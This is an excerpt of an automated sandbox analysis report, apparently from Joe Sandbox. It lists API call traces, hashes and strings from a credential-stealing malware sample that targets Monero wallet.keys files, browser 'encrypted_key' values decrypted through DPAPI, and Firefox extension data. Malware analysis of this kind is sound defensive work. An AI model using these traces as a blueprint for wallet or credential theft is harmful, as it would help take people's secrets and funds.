                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EF8B60: GetSystemTime.KERNEL32(00F00E1A,0168C928,00F005AE,?,?,00EE13F9,?,0000001A,00F00E1A,00000000,?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EF8B86
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EEA2E1
                      • lstrlen.KERNEL32(00000000,00000000), ref: 00EEA3FF
                      • lstrlen.KERNEL32(00000000), ref: 00EEA6BC
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                      • DeleteFileA.KERNEL32(00000000), ref: 00EEA743
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: c7c4fd4d4f7e8e11915d5704e04eb96a5167666e50a9a1d432353a1d5526b888
                      • Instruction ID: ae286cf5cccaad6df37b2debaea4c4f2e70b747810b9ba99ec7584696b1ad4eb
                      • Opcode Fuzzy Hash: c7c4fd4d4f7e8e11915d5704e04eb96a5167666e50a9a1d432353a1d5526b888
                      • Instruction Fuzzy Hash: D4E133B281004CAACB18FBA4DC95EFE7378AF54340F549179F61A76091EF706A4DCB62
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EF8B60: GetSystemTime.KERNEL32(00F00E1A,0168C928,00F005AE,?,?,00EE13F9,?,0000001A,00F00E1A,00000000,?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EF8B86
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EED481
                      • lstrlen.KERNEL32(00000000), ref: 00EED698
                      • lstrlen.KERNEL32(00000000), ref: 00EED6AC
                      • DeleteFileA.KERNEL32(00000000), ref: 00EED72B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: b9d02ac35dfd9a34375c7c1f8fe1e8efdb376275d0ebdcfb02735c1615027aca
                      • Instruction ID: f4e29f30af5ccada1ac10a76bcf5cf2810755d3cfde2707cd5a83fef9d7872fd
                      • Opcode Fuzzy Hash: b9d02ac35dfd9a34375c7c1f8fe1e8efdb376275d0ebdcfb02735c1615027aca
                      • Instruction Fuzzy Hash: 939133B281010C9ACB18FBA0DC56DFE7378AF54300F549179F61BBA095EF746A49CB62
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EF8B60: GetSystemTime.KERNEL32(00F00E1A,0168C928,00F005AE,?,?,00EE13F9,?,0000001A,00F00E1A,00000000,?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EF8B86
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EED801
                      • lstrlen.KERNEL32(00000000), ref: 00EED99F
                      • lstrlen.KERNEL32(00000000), ref: 00EED9B3
                      • DeleteFileA.KERNEL32(00000000), ref: 00EEDA32
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: f67d2c6f971d7e1448556fc2600d4abde38315d1e833c4b51892714773d06b66
                      • Instruction ID: 1a2fbec56097a053862e17ada41d38496057618014a208415a19ab9fd891fc1d
                      • Opcode Fuzzy Hash: f67d2c6f971d7e1448556fc2600d4abde38315d1e833c4b51892714773d06b66
                      • Instruction Fuzzy Hash: 788112B281014C9ACB18FBA0DC56DFE7378AF54300F549138F61BBA095EF746A59CB62
                      APIs
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                        • Part of subcall function 00EE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE99EC
                        • Part of subcall function 00EE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EE9A11
                        • Part of subcall function 00EE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EE9A31
                        • Part of subcall function 00EE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EE148F,00000000), ref: 00EE9A5A
                        • Part of subcall function 00EE99C0: LocalFree.KERNEL32(00EE148F), ref: 00EE9A90
                        • Part of subcall function 00EE99C0: CloseHandle.KERNEL32(000000FF), ref: 00EE9A9A
                        • Part of subcall function 00EF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EF8E52
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00F01580,00F00D92), ref: 00EEF54C
                      • lstrlen.KERNEL32(00000000), ref: 00EEF56B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                      • String ID: ^userContextId=4294967295$moz-extension+++
                      • API String ID: 998311485-3310892237
                      • Opcode ID: 0864756a225ba414f99542b152162c819ac431b904287e4ac6ef5ec81d7bc4e8
                      • Instruction ID: 9099bc8f264ac7363eb6edd1a932a81f2786f13fbb79524b6bc282a1d84e20dd
                      • Opcode Fuzzy Hash: 0864756a225ba414f99542b152162c819ac431b904287e4ac6ef5ec81d7bc4e8
                      • Instruction Fuzzy Hash: 195124B290014CAADB08FFA0DC56DFD73B8AF94340F449538F51A7B195EE746609CBA2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy
                      • String ID: s$s$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                      • API String ID: 3722407311-3520659465
                      • Opcode ID: 6c72df5518b12f15cb5f11bc6807b7b6e144e70e61149e4208e08c91c8193e71
                      • Instruction ID: 4b976dc3e397e768654b7be3b3a5b037be5142c8ea70e406dd62fa5d4cac6e1b
                      • Opcode Fuzzy Hash: 6c72df5518b12f15cb5f11bc6807b7b6e144e70e61149e4208e08c91c8193e71
                      • Instruction Fuzzy Hash: 4F516CB1D0421CABDB24EF90DC85BFEB3B4AF44304F14A1A8E25976181EB746E88DF55
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen
                      • String ID:
                      • API String ID: 367037083-0
                      • Opcode ID: c7033e04e8e3577ce3c5a72aa66fb2e4cc319ffc0c9ca6ffe67099ffc557f782
                      • Instruction ID: eeabec7c8e9d47f201ddfdcf08b93aed8e7da730b72d9072502aab623f553afb
                      • Opcode Fuzzy Hash: c7033e04e8e3577ce3c5a72aa66fb2e4cc319ffc0c9ca6ffe67099ffc557f782
                      • Instruction Fuzzy Hash: 97412FB1D1010DABCB04EFB4D845AFEB7B4AF44305F149028F616BA290DB75AA45DBA2
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE99EC
                        • Part of subcall function 00EE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EE9A11
                        • Part of subcall function 00EE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EE9A31
                        • Part of subcall function 00EE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EE148F,00000000), ref: 00EE9A5A
                        • Part of subcall function 00EE99C0: LocalFree.KERNEL32(00EE148F), ref: 00EE9A90
                        • Part of subcall function 00EE99C0: CloseHandle.KERNEL32(000000FF), ref: 00EE9A9A
                        • Part of subcall function 00EF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EF8E52
                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00EE9D39
                        • Part of subcall function 00EE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EE9AEF
                        • Part of subcall function 00EE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00EE4EEE,00000000,?), ref: 00EE9B01
                        • Part of subcall function 00EE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EE9B2A
                        • Part of subcall function 00EE9AC0: LocalFree.KERNEL32(?,?,?,?,00EE4EEE,00000000,?), ref: 00EE9B3F
                        • Part of subcall function 00EE9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00EE9B84
                        • Part of subcall function 00EE9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00EE9BA3
                        • Part of subcall function 00EE9B60: LocalFree.KERNEL32(?), ref: 00EE9BD3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                      • String ID: $"encrypted_key":"$DPAPI
                      • API String ID: 2100535398-738592651
                      • Opcode ID: 86df546b8c09946299ee753da2699f56816311e5b981488600e5e2f0116aa538
                      • Instruction ID: 637f2b905718b4316c50d0a7f4d0ac966c047aecb0ef600301d194d55f354f0c
                      • Opcode Fuzzy Hash: 86df546b8c09946299ee753da2699f56816311e5b981488600e5e2f0116aa538
                      • Instruction Fuzzy Hash: 12312CB6D1021DABCF14DBE5DC85AEEB7F8AB48304F145519EA05B7242EB309A04CBA1
                      APIs
                      • __getptd.LIBCMT ref: 00EFC74E
                        • Part of subcall function 00EFBF9F: __amsg_exit.LIBCMT ref: 00EFBFAF
                      • __getptd.LIBCMT ref: 00EFC765
                      • __amsg_exit.LIBCMT ref: 00EFC773
                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00EFC797
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                      • String ID:
                      • API String ID: 300741435-0
                      • Opcode ID: 7fd9f046e01f088eba22c49d6cb3be0a40778a34e974de04f40504cee77fdab6
                      • Instruction ID: fa5c7443c8f773e1db080e1bfc23aa2442b07fccd3924a9c5c8bfda79986c346
                      • Opcode Fuzzy Hash: 7fd9f046e01f088eba22c49d6cb3be0a40778a34e974de04f40504cee77fdab6
                      • Instruction Fuzzy Hash: 2CF09A32A0430C9BD720BBB89D06B7A33E06F00724F38614AF714BA1D2EB685940EE56
                      APIs
                        • Part of subcall function 00EF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EF8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF4F7A
                      • lstrcat.KERNEL32(?,00F01070), ref: 00EF4F97
                      • lstrcat.KERNEL32(?,01688848), ref: 00EF4FAB
                      • lstrcat.KERNEL32(?,00F01074), ref: 00EF4FBD
                        • Part of subcall function 00EF4910: wsprintfA.USER32 ref: 00EF492C
                        • Part of subcall function 00EF4910: FindFirstFileA.KERNEL32(?,?), ref: 00EF4943
                        • Part of subcall function 00EF4910: StrCmpCA.SHLWAPI(?,00F00FDC), ref: 00EF4971
                        • Part of subcall function 00EF4910: StrCmpCA.SHLWAPI(?,00F00FE0), ref: 00EF4987
                        • Part of subcall function 00EF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00EF4B7D
                        • Part of subcall function 00EF4910: FindClose.KERNEL32(000000FF), ref: 00EF4B92
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                      • String ID:
                      • API String ID: 2667927680-0
                      • Opcode ID: e37753494342747cfa61acddef57abf8f6a4de2c72e5d8269885bde1cdad3cf1
                      • Instruction ID: e44d6de87bc77bf7fec5ec0c20c50523dc2c52096ccc92c6d930b903fa029546
                      • Opcode Fuzzy Hash: e37753494342747cfa61acddef57abf8f6a4de2c72e5d8269885bde1cdad3cf1
                      • Instruction Fuzzy Hash: 012188B690020877C778FB60EC46EEE377CAB94300F404594F659A7585EEB496D88B92